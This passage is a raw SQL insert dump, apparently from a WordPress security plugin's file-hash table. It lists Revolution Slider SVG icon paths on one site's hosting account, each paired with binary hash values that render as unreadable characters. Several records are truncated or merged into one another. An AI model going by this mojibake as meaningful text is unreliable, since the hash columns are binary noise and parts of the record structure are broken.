M4B[v','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_bookmark_border_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_bookmark_border_24px.svg',0,'B#R%Ba','B#R%Ba','&D\rDb^K\nZ{0B`0\0#','',0,'?'),('UQȕPj','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_bug_report_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_bug_report_24px.svg',0,'8b=WhqMh','8b=WhqMh','z\Zl.ݹTgunfRc\\V','',0,'?'),('v+Qo\rg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_build_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_build_24px.svg',0,'TtJU~#V[6','TtJU~#V[6','C\\\0\"˟ 0\'+F~b`C@fk1','',0,'?'),('<>vA%Fn','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_cached_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_cached_24px.svg',0,'iB.L^9.','iB.L^9.','le&>g`m.X9T,a -o','',0,'?'),(' ݪ\"ӓ]z','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_camera_enhance_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_camera_enhance_24px.svg',0,'( a%*%','( a%*%','B˜i\nkк\ZƋLL9ڛ)|','',0,'?'),('/ӞV//Q','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_card_giftcard_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_card_giftcard_24px.svg',0,'Ⱦ|sO#4c','Ⱦ|sO#4c','UbTLrg$T)\\w^X','',0,'?'),('cRN3WO.\Z','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_card_membership_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_card_membership_24px.svg',0,'\0gv\\1|z','\0gv\\1|z','Mri\" C։LbZ`|g&','',0,'?'),('r´+0z{OJ^','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_card_travel_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_card_travel_24px.svg',0,'P)C*@F$','P)C*@F$',' & : VQ\0_E uN]','',0,'?'),('lʉ~\npՉV','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_change_history_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_change_history_24px.svg',0,'3jς{6p^K','3jς{6p^K','ꬵZ!圕\0~I.DyG','',0,'?'),('iqr-s','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_check_circle_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_check_circle_24px.svg',0,'q\0;G1','q\0;G1','Z܁4B}-WF+_,W','',0,'?'),('<9RXR @d','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_chrome_reader_mode_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_chrome_reader_mode_24px.svg',0,'~=9<I?f','~=9<I?f','PX$n%W\'bKI*>k','',0,'?'),('*>\'bDX?aY*','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_class_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_class_24px.svg',0,';CY;hP',';CY;hP','\Zq27:k~cL:m','',0,'?'),('=\0Q\'YH','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_code_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_code_24px.svg',0,':V\"v ',':V\"v ','aFހV?n}+9W`','',0,'?'),('(2 Q\"k6=K','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_compare_arrows_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_compare_arrows_24px.svg',0,'\Zۮn+yCPjb','\Zۮn+yCPjb','0DI}4|Ƥ.D5VI׊.h%','',0,'?'),('HhILR÷W','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_copyright_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_copyright_24px.svg',0,'21oG㎭','21oG㎭','ב\"]; ޡZ~6FDn*','',0,'?'),('f$5svS2','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_credit_card_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_credit_card_24px.svg',0,'zG}},-3X','zG}},-3X',']|cƈ\n\\އpӧ!ξ \Z','',0,'?'),('~ ud0Znr','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_dashboard_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_dashboard_24px.svg',0,'Nm /Nϩ','Nm /Nϩ','T-qEN\rj[%9=->','',0,'?'),('Mhć򉌉','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_date_range_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_date_range_24px.svg',0,'r^(-NL>','r^(-NL>','4ϾʎVR$׸ 󳀙ٖ<&\\','',0,'?'),('as\Zos','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_delete_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_delete_24px.svg',0,'֌NAg?)?y','֌NAg?)?y','BWW>U\rM-⧒,u!','',0,'?'),('A\"|>uڔ','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_description_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_description_24px.svg',0,'d16cby]','d16cby]','3ބښqB DoL70Ps','',0,'?'),('Kg3sU-8B','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_dns_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_dns_24px.svg',0,'2PyؑP=Z ','2PyؑP=Z ','FRNgo_?OCwl0','',0,'?'),('4?܏Noo','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_done_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_done_24px.svg',0,'͓`ݫ6E~','͓`ݫ6E~','Gwv_k k;bz#tͶ','',0,'?'),(' sw4@澵','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_done_all_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_done_all_24px.svg',0,'<\n+','<\n+','d9;2\\&Vh-FS32_H','',0,'?'),(' ҡ@RɄj(','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_donut_large_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_donut_large_24px.svg',0,'gA~6*OMfY3','gA~6*OMfY3','xwrxw3N0ơˢoEe݁渖\02','',0,'?'),('ٽ_sU:+','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_donut_small_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_donut_small_24px.svg',0,'\nIu\0n(\"9','\nIu\0n(\"9','_مXm=ۋiŤP\'\nJUV','',0,'?'),('W3\0b78:','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_eject_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_eject_24px.svg',0,'T̝sLrb%V','T̝sLrb%V','dAj\r86#Ӈ:쓋!','',0,'?'),('66$md;w','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_event_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_event_24px.svg',0,':ɘ',':ɘ','M!LAY(;3B~z2}i YJWU','',0,'?'),('^Sr.sO','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_event_seat_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_event_seat_24px.svg',0,'0R\'`~L h6','0R\'`~L h6','M9\'\'$K(#^gK\Z','',0,'?'),('̣M?|%c!','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_exit_to_app_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_exit_to_app_24px.svg',0,'RKq^cG*','RKq^cG*','NJA {M5_ e֛G\ZmQ(a `','',0,'?'),('CTkm5\Z','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_explore_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_explore_24px.svg',0,'M4\rll','M4\rll','Eˣ/OS9hZ\\Td\'h','',0,'?'),('!VI8n=u','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_extension_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_extension_24px.svg',0,'e9]/\0]PL+','e9]/\0]PL+','sc}ZE4>q*]eϰ|','',0,'?'),('N߇&u;A','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_face_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_face_24px.svg',0,'\\0^c2!ۚ%','\\0^c2!ۚ%','aNHxjbE gl)\r.r|6','',0,'?'),('وT={96?@H','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_favorite_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_favorite_24px.svg',0,'\'? 0&~\"A2`','\'? 0&~\"A2`','N#ә&;oE\rnlN.s2R/k','',0,'?'),('Lhz_i\nn)\"4','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_favorite_border_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_favorite_border_24px.svg',0,'$L','$L','rK<݅qeNS% <\n\0k','',0,'?'),('\0n~jC','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_feedback_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_feedback_24px.svg',0,'?ә`EC -,p','?ә`EC -,p','c3\rmpi 2S8;h mz','',0,'?'),('Am NO?','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_find_in_page_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_find_in_page_24px.svg',0,'^ʞ|?=O020','^ʞ|?=O020','S\"2ȋ:a5p]C<:F}ܽ)^','',0,'?'),('Yfѥ┧','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_find_replace_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_find_replace_24px.svg',0,'̟}R)bn','̟}R)bn',']{ރ1ڽ7scRc2޳M','',0,'?'),('>xے  4','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_fingerprint_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_fingerprint_24px.svg',0,'ivaa\"[*%f2','ivaa\"[*%f2',',9,9ooNS}qGx` 1c&c','',0,'?'),('95-iC~j\'','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_flight_land_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_flight_land_24px.svg',0,'ܫؘa*jK\r:','ܫؘa*jK\r:','r?ݖNA{pȻڅ[a$ES','',0,'?'),('ܵ[g9Ĭ ','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_flight_takeoff_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_flight_takeoff_24px.svg',0,'(%m_QbRβ~\Z','(%m_QbRβ~\Z','iU;A¯+aPDw/bV+X\n]','',0,'?'),('=i~I1l','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_flip_to_back_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_flip_to_back_24px.svg',0,'#9!QD@?b','#9!QD@?b','\\jvݘ 5d)aP]ا-\"','',0,'?'),('Y2@rX\Z','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_flip_to_front_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_flip_to_front_24px.svg',0,'ZK}1gc','ZK}1gc','+#eD cW\nomħ','',0,'?'),('3E^tRw rb','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_gavel_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_gavel_24px.svg',0,'Q%Epzb','Q%Epzb','ZEܴ>Ok:ݎo','',0,'?'),('cr%:AXE%U\0','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_get_app_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_get_app_24px.svg',0,'T7_tn3,g','T7_tn3,g','7dd=jph a\\(/ήۢ','',0,'?'),('a RU','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_gif_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_gif_24px.svg',0,'a-Dd?\\ WXlW','a-Dd?\\ WXlW','0ЖF=͢ڷW]~鴗\Zk;p|ک','',0,'?'),('4CNu','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_grade_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_grade_24px.svg',0,'&s','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_highlight_off_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_highlight_off_24px.svg',0,'#X׻3뽒@wV','#X׻3뽒@wV','LbCN@q(uHձ/\r','',0,'?'),('@4Ѧ)@I','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_history_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_history_24px.svg',0,'@.j˝F:mf','@.j˝F:mf','7)\\*\0du.iTb8醼OZ]','',0,'?'),('AȺ*iMLE','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_home_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_home_24px.svg',0,'ۂ#i|\n(','ۂ#i|\n(','\'%Hym﬑PIlfO','',0,'?'),('ʘ{ k2I ','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_hourglass_empty_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_hourglass_empty_24px.svg',0,'~ce%if','~ce%if',' W:lc ͍\nWhX3\\J','',0,'?'),('OGϏjD}','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_hourglass_full_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_hourglass_full_24px.svg',0,'*{6d','*{6d','-KCl^,3NCj\\ &4gq՝','',0,'?'),(' cNE~E)5j','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_http_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_http_24px.svg',0,'J\n)x ','J\n)x ','~Ƥl{P6A_~SB=P 1/','',0,'?'),('M)\n$(Dg @s0w','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_https_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_https_24px.svg',0,'D?-_XuR','D?-_XuR','\'܀e\'6h\0Vt*H','',0,'?'),('_ԢF$\r','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_important_devices_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_important_devices_24px.svg',0,'=#\\!>;h˽','=#\\!>;h˽','yuipăY8Q}o{lt','',0,'?'),('4? }:Pmi=','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_info_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_info_24px.svg',0,'FX\0Z1f+','FX\0Z1f+',' t<ڴ.~`xxxҼmZ','',0,'?'),('7aݒ','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_info_outline_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_info_outline_24px.svg',0,'O2>C09','O2>C09','a?85]~|ls;m\"','',0,'?'),('⪪82c=t*l','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_input_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_input_24px.svg',0,'4yb`_Of','4yb`_Of','-h\"ogɒN TEJC*r','',0,'?'),('郸FP9\"V','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_invert_colors_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_invert_colors_24px.svg',0,'Ihh^]wPٲ\Z','Ihh^]wPٲ\Z','ڌ8CPjO|HA+[rM6','',0,'?'),('GG\"(d)׿]','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_label_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_label_24px.svg',0,'D[fE8.;:S','D[fE8.;:S','^sbݪǨ!^JG(%~}= -ph','',0,'?'),('sât]sa_<H','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_label_outline_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_label_outline_24px.svg',0,'nr','nr','{\0(n&9ׁ;K6f3','',0,'?'),(',]>۱̏h','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_language_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_language_24px.svg',0,'ND ǩg;+M','ND ǩg;+M','2A L ߇2Oy','',0,'?'),('nHɾެͧ','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_launch_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_launch_24px.svg',0,' /Epn{-!',' /Epn{-!','H;\0\Zc^*\'%rN=','',0,'?'),('ÇJoD\rZR','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_lightbulb_outline_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_lightbulb_outline_24px.svg',0,')ݧ6 \n',')ݧ6 \n','6٭5JOWqJ\Z6L4AA2','',0,'?'),('1o7$Tԁ`r','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_line_style_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_line_style_24px.svg',0,'R.!\0Y>}','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_list_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_list_24px.svg',0,' 3.v;moU',' 3.v;moU','lM(M~6OEo_\"I','',0,'?'),(' 7X ÕL\0l','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_lock_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_lock_24px.svg',0,'D?-_XuR','D?-_XuR','\'܀e\'6h\0Vt*H','',0,'?'),('L?\n-Vd} ','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_lock_open_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_lock_open_24px.svg',0,'^},}*^],c','^},}*^],c','\Z1*bSHв(V&TzV?MXJ','',0,'?'),('L}P5shyq%','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_lock_outline_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_lock_outline_24px.svg',0,'~1ߊ!I','~1ߊ!I','-uKHO\nT)0N P9','',0,'?'),('FNj[p','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_loyalty_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_loyalty_24px.svg',0,'8L\'aۊh','8L\'aۊh','K\'ujֶÕv LHmZ*l','',0,'?'),('J;9','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_markunread_mailbox_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_markunread_mailbox_24px.svg',0,'/Tj`8h','/Tj`8h','Cy \\P;(5sPflti+9','',0,'?'),('ѯ0sS՚U) ','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_motorcycle_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_motorcycle_24px.svg',0,'>Ft;]','>Ft;]','y7W(4b_ԹX~','',0,'?'),('˩9e\"_N73txr\r','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_note_add_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_note_add_24px.svg',0,'Y(Ekjjj\"a','Y(Ekjjj\"a','Z!MWGV+ur- Gaw','',0,'?'),('G>ypq)q','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_offline_pin_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_offline_pin_24px.svg',0,'ۻ)y#⧈','',0,'?'),('scAvpD','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_perm_device_information_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_perm_device_information_24px.svg',0,'\\+ SK','\\+ SK','Ua\Za/6I*&A\0JwW0j$','',0,'?'),('zL+c4Y','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_perm_identity_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_perm_identity_24px.svg',0,'@Ĥu@u\\','@Ĥu@u\\','uك#spO_=NAbmt6','',0,'?'),('4k%,X\0e,6K','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_perm_media_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_perm_media_24px.svg',0,'9;?(WO1`','9;?(WO1`','l\n/+#?<^ 2HN','',0,'?'),(') k6 ','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_perm_phone_msg_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_perm_phone_msg_24px.svg',0,'%,?&s','%,?&s','B>kMbiP:qlBiqkij܁Zd','',0,'?'),('E/!mфdq_1','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_perm_scan_wifi_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_perm_scan_wifi_24px.svg',0,'W_MJxx|ZH','W_MJxx|ZH','>%cuѢ3Lї~\'H9(пa,','',0,'?'),('p1KM,rN','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_pets_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_pets_24px.svg',0,'8Mʨ!Gt\ZpP','8Mʨ!Gt\ZpP','|_m -e9UQwiERۭ.','',0,'?'),('rWz/~[','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_picture_in_picture_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_picture_in_picture_24px.svg',0,'oEvx 9k ty','oEvx 9k ty','\'?_Z&iYn','',0,'?'),('&XU_Nf# %','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_picture_in_picture_alt_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_picture_in_picture_alt_24px.svg',0,'vru\\+X%)+T','vru\\+X%)+T','і$<}LǃH](Dkp*','',0,'?'),('!\'b\"{o','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_play_for_work_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_play_for_work_24px.svg',0,'Uf+}ˮ','Uf+}ˮ','rvzntco&z6P MdF','',0,'?'),('Z p`O`o','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_polymer_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_polymer_24px.svg',0,'/@7f O(','/@7f O(',';\'XS _4S3zr{','',0,'?'),('qv.eu WPH','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_power_settings_new_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_power_settings_new_24px.svg',0,'g{ۻE@$$6a','g{ۻE@$$6a','f1~I\np|uRFAԿgFK#','',0,'?'),('#`\\T{ňw','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_pregnant_woman_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_pregnant_woman_24px.svg',0,'rJFUَ\"͙Ss4','rJFUَ\"͙Ss4','M`s#OH~aӍ(p%LdY','',0,'?'),('H\04D&n','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_print_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_print_24px.svg',0,')>0\nG\ZrQF',')>0\nG\ZrQF',']$pz:\'CR\0syL9#?','',0,'?'),('aM&թ;?_6','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_query_builder_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_query_builder_24px.svg',0,'\n8l}+QG ','\n8l}+QG ','~2`[ éYR:ٗέ0\0#$s(','',0,'?'),('A͐!;\n','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_question_answer_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_question_answer_24px.svg',0,'#5\\#N','#5\\#N','HFS:9zӣ^]\n','',0,'?'),('+aIo=K]lQ','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_receipt_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_receipt_24px.svg',0,'@_\"qn%\0#&0p','@_\"qn%\0#&0p','h(5\r^X̦4FRC','',0,'?'),('73h\rC3p.','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_record_voice_over_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_record_voice_over_24px.svg',0,'K88wrm','K88wrm','Ewt\0ty6mkX061@%h','',0,'?'),('7\0D,N䢣','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_redeem_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_redeem_24px.svg',0,'Ⱦ|sO#4c','Ⱦ|sO#4c','UbTLrg$T)\\w^X','',0,'?'),('`ǣe]+VW','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_reorder_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_reorder_24px.svg',0,'!n>qMVa˿-','!n>qMVa˿-','\'#oaP\rRÆ$x:A','',0,'?'),('/ӱ`7$','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_report_problem_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_report_problem_24px.svg',0,'k(1:bck','k(1:bck','*t蛪 tmSI o2\r|o۲2k','',0,'?'),('{גuZ[ݽ','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_restore_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_restore_24px.svg',0,'@.j˝F:mf','@.j˝F:mf','7)\\*\0du.iTb8醼OZ]','',0,'?'),('me#ETп','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_room_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_room_24px.svg',0,'I}Ԛ^޵Q\Zw','I}Ԛ^޵Q\Zw','\\]:0cA7kT` (\0','',0,'?'),('Q$L\n\rB','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_rounded_corner_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_rounded_corner_24px.svg',0,'27Y~)V\Zo4','27Y~)V\Zo4','OLG-','w>LG-','! -+@ؖ.޻P;; ','',0,'?'),('.+HLh`','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_settings_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_settings_24px.svg',0,'\'eO @','\'eO 